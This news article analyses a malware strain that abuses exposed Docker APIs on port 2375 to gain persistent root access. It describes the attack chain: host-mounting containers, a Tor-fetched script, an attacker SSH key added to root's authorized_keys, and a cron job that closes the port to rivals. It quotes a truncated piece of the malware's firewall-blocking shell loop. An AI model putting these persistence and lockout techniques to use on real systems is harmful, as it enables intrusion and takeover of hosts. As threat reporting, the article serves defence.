A sophisticated malware strain targeting exposed Docker APIs has emerged with enhanced infection capabilities that go beyond traditional cryptomining operations.
The threat, discovered in August 2025, demonstrates evolved tactics designed to establish persistent root access while denying other attackers access to compromised systems.
The malware represents a significant evolution from a variant originally reported by Trend Micro in June 2025.
While the initial strain focused primarily on cryptocurrency mining operations hidden behind Tor infrastructure, this new iteration exhibits more complex behavior patterns.
The attack begins by exploiting misconfigured Docker APIs accessible from the internet, specifically targeting port 2375 where administrators have inadvertently exposed their Docker daemon without proper authentication.
The infection process starts when attackers create malicious containers based on Alpine Linux images, mounting the host filesystem to gain privileged access.
Through a Base64-encoded payload, the malware downloads and executes a shell script from a Tor hidden service, establishing multiple persistence mechanisms across the compromised system.
Akamai analysts identified this variant during routine honeypot monitoring, noting distinct behavioral differences from previously documented attacks.
The researchers observed that unlike its predecessors, this strain implements superiority tactics designed to lock out competing threat actors from the same vulnerable systems.
Advanced Persistence and Defense Evasion Mechanisms
The malware’s most notable advancement lies in its comprehensive approach to maintaining exclusive access to compromised infrastructure.
After initial compromise, the attack deploys a script called docker-init.sh that implements multiple layers of persistence and defensive measures.
The persistence mechanism operates through several coordinated actions. First, the malware appends an attacker-controlled SSH public key to /root/.ssh/authorized_keys, enabling direct root access bypass normal authentication procedures.
Subsequently, it establishes a cron job that executes every minute, systematically blocking access to port 2375 across multiple firewall platforms including iptables, ufw, firewall-cmd, pfctl, and nft.
PORT=2375
PROTOCOL=tcp
for fw in firewall-cmd ufw pfctl iptables nft; do
if command -v "$fw" >/dev/null 2>&1; then
case "$fw" in
firewall-cmd)
firewall-cmd --permanent --zone=public --add-rich-rule="rule family='ipv4' port protocol="tcp" port="2375" reject"
firewall-cmd --reloadThis defensive blocking represents a territorial approach rarely seen in container-based attacks.
By systematically closing the Docker API port that enabled their initial access, the attackers prevent other malicious actors from exploiting the same vulnerability while maintaining their established foothold through SSH access.
.webp "New Malware Attack Leveraging Exposed Docker APIs to Maintain Persistent SSH Root Access 3")
The malware also installs reconnaissance tools including masscan for network scanning, along with torsocks for anonymous communications.
These components enable the malware to identify and compromise additional vulnerable Docker instances across the network, creating potential for large-scale botnet operations.
The combination of persistent access, competitive exclusion, and propagation capabilities positions this malware as a significant threat to containerized environments.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Source link
